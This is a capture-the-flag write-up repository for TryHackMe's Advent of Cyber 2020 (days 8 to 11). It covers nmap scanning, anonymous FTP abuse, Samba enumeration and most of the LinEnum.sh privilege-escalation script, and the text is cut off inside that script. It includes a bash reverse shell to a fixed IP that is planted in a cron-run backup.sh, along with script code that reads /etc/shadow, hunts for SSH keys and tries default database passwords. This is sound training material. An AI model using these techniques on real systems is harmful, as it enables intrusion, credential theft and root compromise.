FILE: Advent-of-Cyber-2020/Day-08-What's_Under_the_Christmas_Tree?/README.md
================================================
# What's unders the Christmas Tree?
- When was Snort created?
- A Google search is enough (as always...).
- `1998`
- Using Nmap on <TARGET_IP>, what are the port numbers of the three services running? (Please provide your answer in ascending order/lowest -> highest, separated by a comma)
- `nmap <TARGET_IP>`
- `80,2222,3389`
- Run a scan and provide the -Pn flag to ignore ICMP being used to determine if the host is up
no answer needed
- `nmap -Pn <TARGET_IP>`
- Experiment with different scan settings such as -A and -sV whilst comparing the outputs given.
no answer needed
- `nmap -A <TARGET_IP>`
- `nmap -sV <TARGET_IP>`
- Use Nmap to determine the name of the Linux distribution that is running, what is reported as the most likely distribution to be running?
- `nmap -Pn -sV <TARGET_IP>`
- `Ubuntu`
- Use Nmap's Network Scripting Engine (NSE) to retrieve the "HTTP-TITLE" of the webserver. Based on the value returned, what do we think this website might be used for?
- `nmap --script=http-title <TARGET_IP>`
- `blog`
- Now use different scripts against the remaining services to discover any further information about them
no answer needed
- `nmap --script=vuln <TARGET_IP>`
- `nmap --script=ssh-auth-methods -p 2222 <TARGET_IP>`
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/README.md
================================================
# Anyone can be Santa!
Before we begin, we're going to need to deploy two Instances:
1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
- Name the directory on the FTP server that has data accessible by the "anonymous" user
- `ftp <TARGET_IP>` and enter `anonymous`
- `public`
- What script gets executed within this directory?
- `backup.sh`
- What movie did Santa have on his Christmas shopping list?
- (ftp) `get shoppinglist.txt`
- `The polar express`
- Re-upload this script to contain malicious data (just like we did in section 9.6. Output the contents of /root/flag.txt!
Note that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have setup a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.
- Insert your IP address in `backup.sh` where is the lable.
- (ftp) `put backup.sh`
- On your machine `nc -lvnp 4444`
- You should get a root shell in a minute.
- `cat /root/flag.txt`
- `THM{****_***_***_**_*****}`
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/backup.sh
================================================
bash -i >& /dev/tcp/10.9.126.198/4444 0>&1
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/old_backup.sh
================================================
#!/bin/bash
# Created by ElfMcEager to backup all of Santa's goodies!
# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";
# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp
# TO-DO: Automate transfer of backups to backup server
================================================
FILE: Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/shoppinglist.txt
================================================
The Polar Express Movie
================================================
FILE: Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/README.md
================================================
# Don't be sElfish!
Before we begin, we're going to need to deploy two Instances:
1. The THM AttackBox by pressing the " Start AttackBox" button at the top-right of the page.
2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
- Using enum4linux, how many users are there on the Samba server?
- `enum4linux -a <TARGET_IP>`
- `3`
- Now how many "shares" are there on the Samba server?
- `4`
- Use smbclient to try to login to the shares on the Samba server (10.10.151.244). What share doesn't require a password?
- `smbclient //<TARGET_IP>/<SHARE>`
- `tbfc-santa`
- Log in to this share, what directory did ElfMcSkidy leave for Santa?
- `jingle-tunes`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/note_from_mcskidy.txt
================================================
Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like! Regards ~ ElfMcSkidy
================================================
FILE: Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/LinEnum.sh
================================================
#!/bin/bash
#A script to enumerate local information from a Linux host
version="version 0.982"
#@rebootuser
#help function
usage ()
{
echo -e "\n\e[00;31m#########################################################\e[00m"
echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m"
echo -e "\e[00;31m#########################################################\e[00m"
echo -e "\e[00;33m# www.rebootuser.com | @rebootuser \e[00m"
echo -e "\e[00;33m# $version\e[00m\n"
echo -e "\e[00;33m# Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t \e[00m\n"
echo "OPTIONS:"
echo "-k Enter keyword"
echo "-e Enter export location"
echo "-s Supply user password for sudo checks (INSECURE)"
echo "-t Include thorough (lengthy) tests"
echo "-r Enter report name"
echo "-h Displays this help text"
echo -e "\n"
echo "Running with no options = limited scans/no output file"
echo -e "\e[00;31m#########################################################\e[00m"
}
header()
{
echo -e "\n\e[00;31m#########################################################\e[00m"
echo -e "\e[00;31m#\e[00m" "\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\e[00m" "\e[00;31m#\e[00m"
echo -e "\e[00;31m#########################################################\e[00m"
echo -e "\e[00;33m# www.rebootuser.com\e[00m"
echo -e "\e[00;33m# $version\e[00m\n"
}
debug_info()
{
echo "[-] Debug Info"
if [ "$keyword" ]; then
echo "[+] Searching for the keyword $keyword in conf, php, ini and log files"
fi
if [ "$report" ]; then
echo "[+] Report name = $report"
fi
if [ "$export" ]; then
echo "[+] Export location = $export"
fi
if [ "$thorough" ]; then
echo "[+] Thorough tests = Enabled"
else
echo -e "\e[00;33m[+] Thorough tests = Disabled\e[00m"
fi
sleep 2
if [ "$export" ]; then
mkdir $export 2>/dev/null
format=$export/LinEnum-export-`date +"%d-%m-%y"`
mkdir $format 2>/dev/null
fi
if [ "$sudopass" ]; then
echo -e "\e[00;35m[+] Please enter password - INSECURE - really only for CTF use!\e[00m"
read -s userpassword
echo
fi
who=`whoami` 2>/dev/null
echo -e "\n"
echo -e "\e[00;33mScan started at:"; date
echo -e "\e[00m\n"
}
# useful binaries (thanks to https://gtfobins.github.io/)
binarylist='aria2c\|arp\|ash\|awk\|base64\|bash\|busybox\|cat\|chmod\|chown\|cp\|csh\|curl\|cut\|dash\|date\|dd\|diff\|dmsetup\|docker\|ed\|emacs\|env\|expand\|expect\|file\|find\|flock\|fmt\|fold\|ftp\|gawk\|gdb\|gimp\|git\|grep\|head\|ht\|iftop\|ionice\|ip$\|irb\|jjs\|jq\|jrunscript\|ksh\|ld.so\|ldconfig\|less\|logsave\|lua\|make\|man\|mawk\|more\|mv\|mysql\|nano\|nawk\|nc\|netcat\|nice\|nl\|nmap\|node\|od\|openssl\|perl\|pg\|php\|pic\|pico\|python\|readelf\|rlwrap\|rpm\|rpmquery\|rsync\|ruby\|run-parts\|rvim\|scp\|script\|sed\|setarch\|sftp\|sh\|shuf\|socat\|sort\|sqlite3\|ssh$\|start-stop-daemon\|stdbuf\|strace\|systemctl\|tail\|tar\|taskset\|tclsh\|tee\|telnet\|tftp\|time\|timeout\|ul\|unexpand\|uniq\|unshare\|vi\|vim\|watch\|wget\|wish\|xargs\|xxd\|zip\|zsh'
system_info()
{
echo -e "\e[00;33m### SYSTEM ##############################################\e[00m"
#basic kernel info
unameinfo=`uname -a 2>/dev/null`
if [ "$unameinfo" ]; then
echo -e "\e[00;31m[-] Kernel information:\e[00m\n$unameinfo"
echo -e "\n"
fi
procver=`cat /proc/version 2>/dev/null`
if [ "$procver" ]; then
echo -e "\e[00;31m[-] Kernel information (continued):\e[00m\n$procver"
echo -e "\n"
fi
#search all *-release files for version info
release=`cat /etc/*-release 2>/dev/null`
if [ "$release" ]; then
echo -e "\e[00;31m[-] Specific release information:\e[00m\n$release"
echo -e "\n"
fi
#target hostname info
hostnamed=`hostname 2>/dev/null`
if [ "$hostnamed" ]; then
echo -e "\e[00;31m[-] Hostname:\e[00m\n$hostnamed"
echo -e "\n"
fi
}
user_info()
{
echo -e "\e[00;33m### USER/GROUP ##########################################\e[00m"
#current user details
currusr=`id 2>/dev/null`
if [ "$currusr" ]; then
echo -e "\e[00;31m[-] Current user/group info:\e[00m\n$currusr"
echo -e "\n"
fi
#last logged on user information
lastlogedonusrs=`lastlog 2>/dev/null |grep -v "Never" 2>/dev/null`
if [ "$lastlogedonusrs" ]; then
echo -e "\e[00;31m[-] Users that have previously logged onto the system:\e[00m\n$lastlogedonusrs"
echo -e "\n"
fi
#who else is logged on
loggedonusrs=`w 2>/dev/null`
if [ "$loggedonusrs" ]; then
echo -e "\e[00;31m[-] Who else is logged on:\e[00m\n$loggedonusrs"
echo -e "\n"
fi
#lists all id's and respective group(s)
grpinfo=`for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null`
if [ "$grpinfo" ]; then
echo -e "\e[00;31m[-] Group memberships:\e[00m\n$grpinfo"
echo -e "\n"
fi
#added by phackt - look for adm group (thanks patrick)
adm_users=$(echo -e "$grpinfo" | grep "(adm)")
if [[ ! -z $adm_users ]];
then
echo -e "\e[00;31m[-] It looks like we have some admin users:\e[00m\n$adm_users"
echo -e "\n"
fi
#checks to see if any hashes are stored in /etc/passwd (depreciated *nix storage method)
hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null`
if [ "$hashesinpasswd" ]; then
echo -e "\e[00;33m[+] It looks like we have password hashes in /etc/passwd!\e[00m\n$hashesinpasswd"
echo -e "\n"
fi
#contents of /etc/passwd
readpasswd=`cat /etc/passwd 2>/dev/null`
if [ "$readpasswd" ]; then
echo -e "\e[00;31m[-] Contents of /etc/passwd:\e[00m\n$readpasswd"
echo -e "\n"
fi
if [ "$export" ] && [ "$readpasswd" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/passwd $format/etc-export/passwd 2>/dev/null
fi
#checks to see if the shadow file can be read
readshadow=`cat /etc/shadow 2>/dev/null`
if [ "$readshadow" ]; then
echo -e "\e[00;33m[+] We can read the shadow file!\e[00m\n$readshadow"
echo -e "\n"
fi
if [ "$export" ] && [ "$readshadow" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/shadow $format/etc-export/shadow 2>/dev/null
fi
#checks to see if /etc/master.passwd can be read - BSD 'shadow' variant
readmasterpasswd=`cat /etc/master.passwd 2>/dev/null`
if [ "$readmasterpasswd" ]; then
echo -e "\e[00;33m[+] We can read the master.passwd file!\e[00m\n$readmasterpasswd"
echo -e "\n"
fi
if [ "$export" ] && [ "$readmasterpasswd" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/master.passwd $format/etc-export/master.passwd 2>/dev/null
fi
#all root accounts (uid 0)
superman=`grep -v -E "^#" /etc/passwd 2>/dev/null| awk -F: '$3 == 0 { print $1}' 2>/dev/null`
if [ "$superman" ]; then
echo -e "\e[00;31m[-] Super user account(s):\e[00m\n$superman"
echo -e "\n"
fi
#pull out vital sudoers info
sudoers=`grep -v -e '^$' /etc/sudoers 2>/dev/null |grep -v "#" 2>/dev/null`
if [ "$sudoers" ]; then
echo -e "\e[00;31m[-] Sudoers configuration (condensed):\e[00m$sudoers"
echo -e "\n"
fi
if [ "$export" ] && [ "$sudoers" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/sudoers $format/etc-export/sudoers 2>/dev/null
fi
#can we sudo without supplying a password
sudoperms=`echo '' | sudo -S -l -k 2>/dev/null`
if [ "$sudoperms" ]; then
echo -e "\e[00;33m[+] We can sudo without supplying a password!\e[00m\n$sudoperms"
echo -e "\n"
fi
#check sudo perms - authenticated
if [ "$sudopass" ]; then
if [ "$sudoperms" ]; then
:
else
sudoauth=`echo $userpassword | sudo -S -l -k 2>/dev/null`
if [ "$sudoauth" ]; then
echo -e "\e[00;33m[+] We can sudo when supplying a password!\e[00m\n$sudoauth"
echo -e "\n"
fi
fi
fi
##known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values) - authenticated
if [ "$sudopass" ]; then
if [ "$sudoperms" ]; then
:
else
sudopermscheck=`echo $userpassword | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null|sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$sudopermscheck" ]; then
echo -e "\e[00;33m[-] Possible sudo pwnage!\e[00m\n$sudopermscheck"
echo -e "\n"
fi
fi
fi
#known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values)
sudopwnage=`echo '' | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$sudopwnage" ]; then
echo -e "\e[00;33m[+] Possible sudo pwnage!\e[00m\n$sudopwnage"
echo -e "\n"
fi
#who has sudoed in the past
whohasbeensudo=`find /home -name .sudo_as_admin_successful 2>/dev/null`
if [ "$whohasbeensudo" ]; then
echo -e "\e[00;31m[-] Accounts that have recently used sudo:\e[00m\n$whohasbeensudo"
echo -e "\n"
fi
#checks to see if roots home directory is accessible
rthmdir=`ls -ahl /root/ 2>/dev/null`
if [ "$rthmdir" ]; then
echo -e "\e[00;33m[+] We can read root's home directory!\e[00m\n$rthmdir"
echo -e "\n"
fi
#displays /home directory permissions - check if any are lax
homedirperms=`ls -ahl /home/ 2>/dev/null`
if [ "$homedirperms" ]; then
echo -e "\e[00;31m[-] Are permissions on /home directories lax:\e[00m\n$homedirperms"
echo -e "\n"
fi
#looks for files we can write to that don't belong to us
if [ "$thorough" = "1" ]; then
grfilesall=`find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
if [ "$grfilesall" ]; then
echo -e "\e[00;31m[-] Files not owned by user but writable by group:\e[00m\n$grfilesall"
echo -e "\n"
fi
fi
#looks for files that belong to us
if [ "$thorough" = "1" ]; then
ourfilesall=`find / -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
if [ "$ourfilesall" ]; then
echo -e "\e[00;31m[-] Files owned by our user:\e[00m\n$ourfilesall"
echo -e "\n"
fi
fi
#looks for hidden files
if [ "$thorough" = "1" ]; then
hiddenfiles=`find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
if [ "$hiddenfiles" ]; then
echo -e "\e[00;31m[-] Hidden files:\e[00m\n$hiddenfiles"
echo -e "\n"
fi
fi
#looks for world-reabable files within /home - depending on number of /home dirs & files, this can take some time so is only 'activated' with thorough scanning switch
if [ "$thorough" = "1" ]; then
wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null`
if [ "$wrfileshm" ]; then
echo -e "\e[00;31m[-] World-readable files within /home:\e[00m\n$wrfileshm"
echo -e "\n"
fi
fi
if [ "$thorough" = "1" ]; then
if [ "$export" ] && [ "$wrfileshm" ]; then
mkdir $format/wr-files/ 2>/dev/null
for i in $wrfileshm; do cp --parents $i $format/wr-files/ ; done 2>/dev/null
fi
fi
#lists current user's home directory contents
if [ "$thorough" = "1" ]; then
homedircontents=`ls -ahl ~ 2>/dev/null`
if [ "$homedircontents" ] ; then
echo -e "\e[00;31m[-] Home directory contents:\e[00m\n$homedircontents"
echo -e "\n"
fi
fi
#checks for if various ssh files are accessible - this can take some time so is only 'activated' with thorough scanning switch
if [ "$thorough" = "1" ]; then
sshfiles=`find / \( -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} 2>/dev/null \;`
if [ "$sshfiles" ]; then
echo -e "\e[00;31m[-] SSH keys/host information found in the following locations:\e[00m\n$sshfiles"
echo -e "\n"
fi
fi
if [ "$thorough" = "1" ]; then
if [ "$export" ] && [ "$sshfiles" ]; then
mkdir $format/ssh-files/ 2>/dev/null
for i in $sshfiles; do cp --parents $i $format/ssh-files/; done 2>/dev/null
fi
fi
#is root permitted to login via ssh
sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'`
if [ "$sshrootlogin" = "yes" ]; then
echo -e "\e[00;31m[-] Root is allowed to login via SSH:\e[00m" ; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#"
echo -e "\n"
fi
}
environmental_info()
{
echo -e "\e[00;33m### ENVIRONMENTAL #######################################\e[00m"
#env information
envinfo=`env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null`
if [ "$envinfo" ]; then
echo -e "\e[00;31m[-] Environment information:\e[00m\n$envinfo"
echo -e "\n"
fi
#check if selinux is enabled
sestatus=`sestatus 2>/dev/null`
if [ "$sestatus" ]; then
echo -e "\e[00;31m[-] SELinux seems to be present:\e[00m\n$sestatus"
echo -e "\n"
fi
#phackt
#current path configuration
pathinfo=`echo $PATH 2>/dev/null`
if [ "$pathinfo" ]; then
pathswriteable=`ls -ld $(echo $PATH | tr ":" " ")`
echo -e "\e[00;31m[-] Path information:\e[00m\n$pathinfo"
echo -e "$pathswriteable"
echo -e "\n"
fi
#lists available shells
shellinfo=`cat /etc/shells 2>/dev/null`
if [ "$shellinfo" ]; then
echo -e "\e[00;31m[-] Available shells:\e[00m\n$shellinfo"
echo -e "\n"
fi
#current umask value with both octal and symbolic output
umaskvalue=`umask -S 2>/dev/null & umask 2>/dev/null`
if [ "$umaskvalue" ]; then
echo -e "\e[00;31m[-] Current umask value:\e[00m\n$umaskvalue"
echo -e "\n"
fi
#umask value as in /etc/login.defs
umaskdef=`grep -i "^UMASK" /etc/login.defs 2>/dev/null`
if [ "$umaskdef" ]; then
echo -e "\e[00;31m[-] umask value as specified in /etc/login.defs:\e[00m\n$umaskdef"
echo -e "\n"
fi
#password policy information as stored in /etc/login.defs
logindefs=`grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null`
if [ "$logindefs" ]; then
echo -e "\e[00;31m[-] Password and storage information:\e[00m\n$logindefs"
echo -e "\n"
fi
if [ "$export" ] && [ "$logindefs" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/login.defs $format/etc-export/login.defs 2>/dev/null
fi
}
job_info()
{
echo -e "\e[00;33m### JOBS/TASKS ##########################################\e[00m"
#are there any cron jobs configured
cronjobs=`ls -la /etc/cron* 2>/dev/null`
if [ "$cronjobs" ]; then
echo -e "\e[00;31m[-] Cron jobs:\e[00m\n$cronjobs"
echo -e "\n"
fi
#can we manipulate these jobs in any way
cronjobwwperms=`find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$cronjobwwperms" ]; then
echo -e "\e[00;33m[+] World-writable cron jobs and file contents:\e[00m\n$cronjobwwperms"
echo -e "\n"
fi
#contab contents
crontabvalue=`cat /etc/crontab 2>/dev/null`
if [ "$crontabvalue" ]; then
echo -e "\e[00;31m[-] Crontab contents:\e[00m\n$crontabvalue"
echo -e "\n"
fi
crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null`
if [ "$crontabvar" ]; then
echo -e "\e[00;31m[-] Anything interesting in /var/spool/cron/crontabs:\e[00m\n$crontabvar"
echo -e "\n"
fi
anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null`
if [ "$anacronjobs" ]; then
echo -e "\e[00;31m[-] Anacron jobs and associated file permissions:\e[00m\n$anacronjobs"
echo -e "\n"
fi
anacrontab=`ls -la /var/spool/anacron 2>/dev/null`
if [ "$anacrontab" ]; then
echo -e "\e[00;31m[-] When were jobs last executed (/var/spool/anacron contents):\e[00m\n$anacrontab"
echo -e "\n"
fi
#pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command)
cronother=`cut -d ":" -f 1 /etc/passwd | xargs -n1 crontab -l -u 2>/dev/null`
if [ "$cronother" ]; then
echo -e "\e[00;31m[-] Jobs held by all users:\e[00m\n$cronother"
echo -e "\n"
fi
# list systemd timers
if [ "$thorough" = "1" ]; then
# include inactive timers in thorough mode
systemdtimers="$(systemctl list-timers --all 2>/dev/null)"
info=""
else
systemdtimers="$(systemctl list-timers 2>/dev/null |head -n -1 2>/dev/null)"
# replace the info in the output with a hint towards thorough mode
info="\e[2mEnable thorough tests to see inactive timers\e[00m"
fi
if [ "$systemdtimers" ]; then
echo -e "\e[00;31m[-] Systemd timers:\e[00m\n$systemdtimers\n$info"
echo -e "\n"
fi
}
networking_info()
{
echo -e "\e[00;33m### NETWORKING ##########################################\e[00m"
#nic information
nicinfo=`/sbin/ifconfig -a 2>/dev/null`
if [ "$nicinfo" ]; then
echo -e "\e[00;31m[-] Network and IP info:\e[00m\n$nicinfo"
echo -e "\n"
fi
#nic information (using ip)
nicinfoip=`/sbin/ip a 2>/dev/null`
if [ ! "$nicinfo" ] && [ "$nicinfoip" ]; then
echo -e "\e[00;31m[-] Network and IP info:\e[00m\n$nicinfoip"
echo -e "\n"
fi
arpinfo=`arp -a 2>/dev/null`
if [ "$arpinfo" ]; then
echo -e "\e[00;31m[-] ARP history:\e[00m\n$arpinfo"
echo -e "\n"
fi
arpinfoip=`ip n 2>/dev/null`
if [ ! "$arpinfo" ] && [ "$arpinfoip" ]; then
echo -e "\e[00;31m[-] ARP history:\e[00m\n$arpinfoip"
echo -e "\n"
fi
#dns settings
nsinfo=`grep "nameserver" /etc/resolv.conf 2>/dev/null`
if [ "$nsinfo" ]; then
echo -e "\e[00;31m[-] Nameserver(s):\e[00m\n$nsinfo"
echo -e "\n"
fi
nsinfosysd=`systemd-resolve --status 2>/dev/null`
if [ "$nsinfosysd" ]; then
echo -e "\e[00;31m[-] Nameserver(s):\e[00m\n$nsinfosysd"
echo -e "\n"
fi
#default route configuration
defroute=`route 2>/dev/null | grep default`
if [ "$defroute" ]; then
echo -e "\e[00;31m[-] Default route:\e[00m\n$defroute"
echo -e "\n"
fi
#default route configuration
defrouteip=`ip r 2>/dev/null | grep default`
if [ ! "$defroute" ] && [ "$defrouteip" ]; then
echo -e "\e[00;31m[-] Default route:\e[00m\n$defrouteip"
echo -e "\n"
fi
#listening TCP
tcpservs=`netstat -ntpl 2>/dev/null`
if [ "$tcpservs" ]; then
echo -e "\e[00;31m[-] Listening TCP:\e[00m\n$tcpservs"
echo -e "\n"
fi
tcpservsip=`ss -t -l -n 2>/dev/null`
if [ ! "$tcpservs" ] && [ "$tcpservsip" ]; then
echo -e "\e[00;31m[-] Listening TCP:\e[00m\n$tcpservsip"
echo -e "\n"
fi
#listening UDP
udpservs=`netstat -nupl 2>/dev/null`
if [ "$udpservs" ]; then
echo -e "\e[00;31m[-] Listening UDP:\e[00m\n$udpservs"
echo -e "\n"
fi
udpservsip=`ss -u -l -n 2>/dev/null`
if [ ! "$udpservs" ] && [ "$udpservsip" ]; then
echo -e "\e[00;31m[-] Listening UDP:\e[00m\n$udpservsip"
echo -e "\n"
fi
}
services_info()
{
echo -e "\e[00;33m### SERVICES #############################################\e[00m"
#running processes
psaux=`ps aux 2>/dev/null`
if [ "$psaux" ]; then
echo -e "\e[00;31m[-] Running processes:\e[00m\n$psaux"
echo -e "\n"
fi
#lookup process binary path and permissisons
procperm=`ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null`
if [ "$procperm" ]; then
echo -e "\e[00;31m[-] Process binaries and associated permissions (from above list):\e[00m\n$procperm"
echo -e "\n"
fi
if [ "$export" ] && [ "$procperm" ]; then
procpermbase=`ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls 2>/dev/null | awk '!x[$0]++' 2>/dev/null`
mkdir $format/ps-export/ 2>/dev/null
for i in $procpermbase; do cp --parents $i $format/ps-export/; done 2>/dev/null
fi
#anything 'useful' in inetd.conf
inetdread=`cat /etc/inetd.conf 2>/dev/null`
if [ "$inetdread" ]; then
echo -e "\e[00;31m[-] Contents of /etc/inetd.conf:\e[00m\n$inetdread"
echo -e "\n"
fi
if [ "$export" ] && [ "$inetdread" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/inetd.conf $format/etc-export/inetd.conf 2>/dev/null
fi
#very 'rough' command to extract associated binaries from inetd.conf & show permisisons of each
inetdbinperms=`awk '{print $7}' /etc/inetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$inetdbinperms" ]; then
echo -e "\e[00;31m[-] The related inetd binary permissions:\e[00m\n$inetdbinperms"
echo -e "\n"
fi
xinetdread=`cat /etc/xinetd.conf 2>/dev/null`
if [ "$xinetdread" ]; then
echo -e "\e[00;31m[-] Contents of /etc/xinetd.conf:\e[00m\n$xinetdread"
echo -e "\n"
fi
if [ "$export" ] && [ "$xinetdread" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/xinetd.conf $format/etc-export/xinetd.conf 2>/dev/null
fi
xinetdincd=`grep "/etc/xinetd.d" /etc/xinetd.conf 2>/dev/null`
if [ "$xinetdincd" ]; then
echo -e "\e[00;31m[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:\e[00m"; ls -la /etc/xinetd.d 2>/dev/null
echo -e "\n"
fi
#very 'rough' command to extract associated binaries from xinetd.conf & show permisisons of each
xinetdbinperms=`awk '{print $7}' /etc/xinetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$xinetdbinperms" ]; then
echo -e "\e[00;31m[-] The related xinetd binary permissions:\e[00m\n$xinetdbinperms"
echo -e "\n"
fi
initdread=`ls -la /etc/init.d 2>/dev/null`
if [ "$initdread" ]; then
echo -e "\e[00;31m[-] /etc/init.d/ binary permissions:\e[00m\n$initdread"
echo -e "\n"
fi
#init.d files NOT belonging to root!
initdperms=`find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$initdperms" ]; then
echo -e "\e[00;31m[-] /etc/init.d/ files not belonging to root:\e[00m\n$initdperms"
echo -e "\n"
fi
rcdread=`ls -la /etc/rc.d/init.d 2>/dev/null`
if [ "$rcdread" ]; then
echo -e "\e[00;31m[-] /etc/rc.d/init.d binary permissions:\e[00m\n$rcdread"
echo -e "\n"
fi
#init.d files NOT belonging to root!
rcdperms=`find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$rcdperms" ]; then
echo -e "\e[00;31m[-] /etc/rc.d/init.d files not belonging to root:\e[00m\n$rcdperms"
echo -e "\n"
fi
usrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null`
if [ "$usrrcdread" ]; then
echo -e "\e[00;31m[-] /usr/local/etc/rc.d binary permissions:\e[00m\n$usrrcdread"
echo -e "\n"
fi
#rc.d files NOT belonging to root!
usrrcdperms=`find /usr/local/etc/rc.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$usrrcdperms" ]; then
echo -e "\e[00;31m[-] /usr/local/etc/rc.d files not belonging to root:\e[00m\n$usrrcdperms"
echo -e "\n"
fi
initread=`ls -la /etc/init/ 2>/dev/null`
if [ "$initread" ]; then
echo -e "\e[00;31m[-] /etc/init/ config file permissions:\e[00m\n$initread"
echo -e "\n"
fi
# upstart scripts not belonging to root
initperms=`find /etc/init \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$initperms" ]; then
echo -e "\e[00;31m[-] /etc/init/ config files not belonging to root:\e[00m\n$initperms"
echo -e "\n"
fi
systemdread=`ls -lthR /lib/systemd/ 2>/dev/null`
if [ "$systemdread" ]; then
echo -e "\e[00;31m[-] /lib/systemd/* config file permissions:\e[00m\n$systemdread"
echo -e "\n"
fi
# systemd files not belonging to root
systemdperms=`find /lib/systemd/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$systemdperms" ]; then
echo -e "\e[00;33m[+] /lib/systemd/* config files not belonging to root:\e[00m\n$systemdperms"
echo -e "\n"
fi
}
software_configs()
{
echo -e "\e[00;33m### SOFTWARE #############################################\e[00m"
#sudo version - check to see if there are any known vulnerabilities with this
sudover=`sudo -V 2>/dev/null| grep "Sudo version" 2>/dev/null`
if [ "$sudover" ]; then
echo -e "\e[00;31m[-] Sudo version:\e[00m\n$sudover"
echo -e "\n"
fi
#mysql details - if installed
mysqlver=`mysql --version 2>/dev/null`
if [ "$mysqlver" ]; then
echo -e "\e[00;31m[-] MYSQL version:\e[00m\n$mysqlver"
echo -e "\n"
fi
#checks to see if root/root will get us a connection
mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null`
if [ "$mysqlconnect" ]; then
echo -e "\e[00;33m[+] We can connect to the local MYSQL service with default root/root credentials!\e[00m\n$mysqlconnect"
echo -e "\n"
fi
#mysql version details
mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null`
if [ "$mysqlconnectnopass" ]; then
echo -e "\e[00;33m[+] We can connect to the local MYSQL service as 'root' and without a password!\e[00m\n$mysqlconnectnopass"
echo -e "\n"
fi
#postgres details - if installed
postgver=`psql -V 2>/dev/null`
if [ "$postgver" ]; then
echo -e "\e[00;31m[-] Postgres version:\e[00m\n$postgver"
echo -e "\n"
fi
#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
postcon1=`psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon1" ]; then
echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1"
echo -e "\n"
fi
postcon11=`psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon11" ]; then
echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11"
echo -e "\n"
fi
postcon2=`psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon2" ]; then
